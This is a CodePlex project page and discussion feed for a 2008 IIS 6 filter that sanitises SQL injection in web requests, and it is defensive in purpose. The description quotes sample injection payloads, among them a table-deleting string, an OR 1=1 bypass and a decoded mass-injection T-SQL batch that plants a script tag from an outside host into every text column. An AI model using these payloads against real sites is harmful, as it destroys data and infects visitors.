IIS 6 SQL Injection Sanitation ISAPI Wildcard

Updated Release: First Release (Dec 01, 2007)

rviana — Tue, 25 Nov 2008 16:05:55 GMT

Project Description

This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.

Important
I have deleted the previous version (1.0) which had about 2,000 downloads. The new version include some features requested by users in the discussion post. Add 2,354 to the number of downloads if you want to know how many people have downloaded the filter so far.

Installation Package v. 2.0 32bits-BETA - It includes an application to change configuration, the possibility of excluding files to be filtered, logging and a better installer including the C++ dependencies. It is compatible with ASP and ASP.NET. It is the preferred download. The only BETA part is the log capability, all the rest is stable.

Installation Package v. 1.5 32bits - Compatible with Frontpage Extensions - is compatible with both classic ASP and ASP.NET.

Introduction

This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT fully support ISAPI Wildcard.

Background

SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example:

C#:
stringSQL = "SELECT * FROM users WHERE userName = \'" + UserId.Text + "\';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If the UserId is entered as: '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

Forcing the return of all rows from table "users".

By Rodney Viana
http://www.rodneyviana.com

Download Installer
First Release

Installation
A video describing the step-by-step installation is available for download in this page.
You can also see written instructions in this Discussion thread: Installation
Version 1.5 is compatible with both classic ASP and ASP.NET.

64-bit Version (beta): The instructions are similar and the install video works the same as well, but the install folder differs and there is no test application, but the test site material is there.

ONLY FOR USERS WITH VERSIONS BEFORE 1.5: Zachary Johnson has identified an issue when someone attacks using both GET and POST at the same time in a very specific situation that also requires access to the receiving form. This could cause the SQL Injection to pass throught in some cases. All versions in this download are free of this problem. If you have a previous version, please update to version 1.5. The update is not available for 64 bits yet.

Released: First Release (Dec 01, 2007)

Tue, 25 Nov 2008 16:05:55 GMT

New Post: Does the filter break multipart/formdata forms?

rviana — Tue, 25 Nov 2008 16:00:57 GMT

Hi Martijnvm,

The exclusion is necessary for all pages receiving these files. It means if there is more than one page receiving uploaded files, you have to make the exclusion. You don't have to make exclusions to pages sending the file if they are not handling the receiving. Also, you will have to review manually these excluded files since they will be prone to sql injections.

New Post: Does the filter break multipart/formdata forms?

martijnvm — Tue, 25 Nov 2008 10:31:45 GMT

Hi Rodney,

I've downloaded the version beta and installed it. Thank you for supplying it.

The pages/forms which were broken by the filter all use a class which is included to handle the uploading of a file.

Is it necessary to make an exception for the included file, or for all the asp files which use this include?

Martijn van Mechelen

Closed Issue: Request to upload a file fails whenever the filter is active

rviana — Fri, 07 Nov 2008 16:37:19 GMT

Related to the following thread:

http://www.codeplex.com/IIS6SQLInjection/Thread/View.aspx?ThreadId=32507
Comments: Fixed on version 2.

New Post: Installation

rviana — Thu, 06 Nov 2008 16:02:02 GMT

Hi Jason,

Please download version 2.

Source code checked in, #15707

rviana — Thu, 06 Nov 2008 02:45:20 GMT

2.0 Beta

New Post: PCannot connect ot VS project after filter install

rviana — Wed, 05 Nov 2008 17:15:42 GMT

Download version 2 and add an exclusion to *.dll.

New Post: Does the filter break multipart/formdata forms?

rviana — Wed, 05 Nov 2008 17:13:24 GMT

Hi Martijn,

Please download version 2 beta and add an exclusion to the file you do not want filtered.

Thanks,

Rodney

Updated Wiki: Home

rviana — Wed, 05 Nov 2008 16:50:19 GMT

Project Description

This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.

NEW BETA
Version 2.0 is available and it includes a configuration application which enables you to enable log and to exclude files from being filtered. Logging capabilities will enable you to verify the attacks you are suffering.

Introduction

This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT support ISAPI Wildcard.

Background

SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example:

C#:
stringSQL = "SELECT * FROM users WHERE userName = \'" + UserId.Text + "\';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If the UserId is entered as: '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

Forcing the return of all rows from table "users".

More sophisticated attack using inline:
http://server/myapp/showproduct.asp?id=z;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0×440045004300…7200%20AS%20NVARCHAR(4000));EXEC(@S);–

… = a few hundred chars that were not included (hex encoded values)

Which translate to the following T-SQL batch:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN
exec(’update ['@T'] set ['@C']=rtrim(convert(varchar,['@C']))+”<script src=http://www.211796*.net/f****}p.js></script>”’)
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

See more about this kind of attack here: http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack

This category of attack is also completely blocked by the filter since the very beta version

By Rodney Viana
http://www.rodneyviana.com
http://blogs.msdn.com/rodneyviana

Download Installer
First Release

Installation
A video describing the step-by-step installation is available here: First Release

You can also see written instructions in this Discussion thread: Installation

64-bit beta version is released

I need beta testers.

Updated Release: First Release (Dec 01, 2007)

rviana — Wed, 05 Nov 2008 16:45:57 GMT

Project Description

This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.

Important
I have deleted the previous version (1.0) which had about 2,000 downloads. The new version include some features requested by users in the discussion post. Add 2,354 to the number of downloads if you want to know how many people have downloaded the filter so far.

Installation Package v. 2.0 32bits-BETA - It includes an application to change configuration, the possibility of excluding files to be filtered, logging and a better installer including the C++ dependencies.

Installation Package v. 1.5 32bits - Compatible with Frontpage Extensions - is compatible with both classic ASP and ASP.NET.

Introduction

This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT fully support ISAPI Wildcard.

Background

SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example:

C#:
stringSQL = "SELECT * FROM users WHERE userName = \'" + UserId.Text + "\';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If the UserId is entered as: '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

Forcing the return of all rows from table "users".

By Rodney Viana
http://www.rodneyviana.com

Download Installer
First Release

Installation
A video describing the step-by-step installation is available for download in this page.
You can also see written instructions in this Discussion thread: Installation
Version 1.5 is compatible with both classic ASP and ASP.NET.

64-bit Version (beta): The instructions are similar and the install video works the same as well, but the install folder differs and there is no test application, but the test site material is there.

ONLY FOR USERS WITH VERSIONS BEFORE 1.5: Zachary Johnson has identified an issue when someone attacks using both GET and POST at the same time in a very specific situation that also requires access to the receiving form. This could cause the SQL Injection to pass throught in some cases. All versions in this download are free of this problem. If you have a previous version, please update to version 1.5. The update is not available for 64 bits yet.

Released: First Release (Dec 01, 2007)

Wed, 05 Nov 2008 16:45:55 GMT

Project Description

This ISAPI wildcard, which works as a ISAPI filter, sanitizes SQL Injection attacks directly from GET and POST variables.

Important
I have deleted the previous version (1.0) which had about 2,000 downloads. The new version include some features requested by users in the discussion post. Add 2,354 to the number of downloads if you want to know how many people have downloaded the filter so far.

Installation Package v. 2.0 32bits-BETA - It includes an application to change configuration, the possibility of excluding files to be filtered, logging and a better installer including the C++ dependencies.

Installation Package v. 1.5 32bits - Compatible with Frontpage Extensions - is compatible with both classic ASP and ASP.NET.

Introduction

This ISAPI dll prevents SQL Injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications not designed to deal with MS SQL Server Injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with no or minimal changes with other database engines.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0 which comes with Windows 2003. Windows XP uses IIS 5 engine which DOES NOT fully support ISAPI Wildcard.

Background

SQL Server Injection is a common technique of application attack targeting the database layer of such application. All applications using string concatenation to create SQL queries instead of parameterized queries are by nature vulnerable, no exceptions. See below a basic example:

C#:
stringSQL = "SELECT * FROM users WHERE userName = \'" + UserId.Text + "\';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If the UserId is entered as: '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

Which will delete table xxxx. Other category of attack is related to privacy. If User Id is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

Forcing the return of all rows from table "users".

By Rodney Viana
http://www.rodneyviana.com

Download Installer
First Release

Installation
A video describing the step-by-step installation is available for download in this page.
You can also see written instructions in this Discussion thread: Installation
Version 1.5 is compatible with both classic ASP and ASP.NET.

64-bit Version (beta): The instructions are similar and the install video works the same as well, but the install folder differs and there is no test application, but the test site material is there.

ONLY FOR USERS WITH VERSIONS BEFORE 1.5: Zachary Johnson has identified an issue when someone attacks using both GET and POST at the same time in a very specific situation that also requires access to the receiving form. This could cause the SQL Injection to pass throught in some cases. All versions in this download are free of this problem. If you have a previous version, please update to version 1.5. The update is not available for 64 bits yet.

New Post: Installation

jgill09 — Thu, 16 Oct 2008 11:07:01 GMT

OK thanks. Look forward to the release.

Jason

New Post: Installation

rviana — Thu, 16 Oct 2008 00:10:33 GMT

Hi Jason,

I am aware of this problem. The version I am working on now will enable you to keep a list of excluded files which won't be filtered. I am about to finish it and when I have it tested I will release. The timeframe is about a month for the new release.

Thanks,

Rodney

New Post: Installation

jgill09 — Wed, 15 Oct 2008 16:20:18 GMT

Hi Rodney,
I recently installed the filter and as a result I am no longer able to upload files (.pdf, .doc etc) or images to the server via my forms when their enctype is set to multipart/data. Also if the forms enctype is set to multipart/data and you do not upload any files the receiving page cannot retrieve the values entered in simple text boxes and instead the values are set to null or blank. The website is built using classic asp. Are you aware of this problem? Is there a workaround for this?

Thanks in advance,
Jason

New Post: *'s being appended to the word 'or'

rviana — Wed, 08 Oct 2008 14:44:57 GMT

Hi V,

This is by design. The idea is to protect against privacy attacks like:
sql = "select * from table1 where id=" & request("id")

and id = "0 or 1=1"

then
select * from table1 where id=0 or 1=1 would result in returning all rows.

Thanks,

Rodney

New Post: *'s being appended to the word 'or'

vsong — Wed, 08 Oct 2008 09:53:16 GMT

Hi there,

Installed the ISAPI filter yesterday after a minor SQL injection hack.
Installation went smoothly and everything works as it should except that all instances of the word 'or' are replaced with '*or*'.

Firstly is this a valid observation from a successful install ?

and secondly is there anyway to get around this without stripping it out manually for every insert ?

Thanks,
V

New Post: Does the filter break multipart/formdata forms?

martijnvm — Mon, 29 Sep 2008 08:59:05 GMT

Hi Rodney,

That's great news! Thank you very much.

Martijn van Mechelen

New Post: Does the filter break multipart/formdata forms?

rviana — Wed, 24 Sep 2008 21:07:49 GMT

Hi Martijn,

Yes, I did. Thanks. I am working on the new version which will enable your upload to run.

Thanks,

Rodney

New Post: Does the filter break multipart/formdata forms?

martijnvm — Thu, 18 Sep 2008 12:00:51 GMT

Hi Rodney,

Did you receive the sample app?

Martijn van Mechelen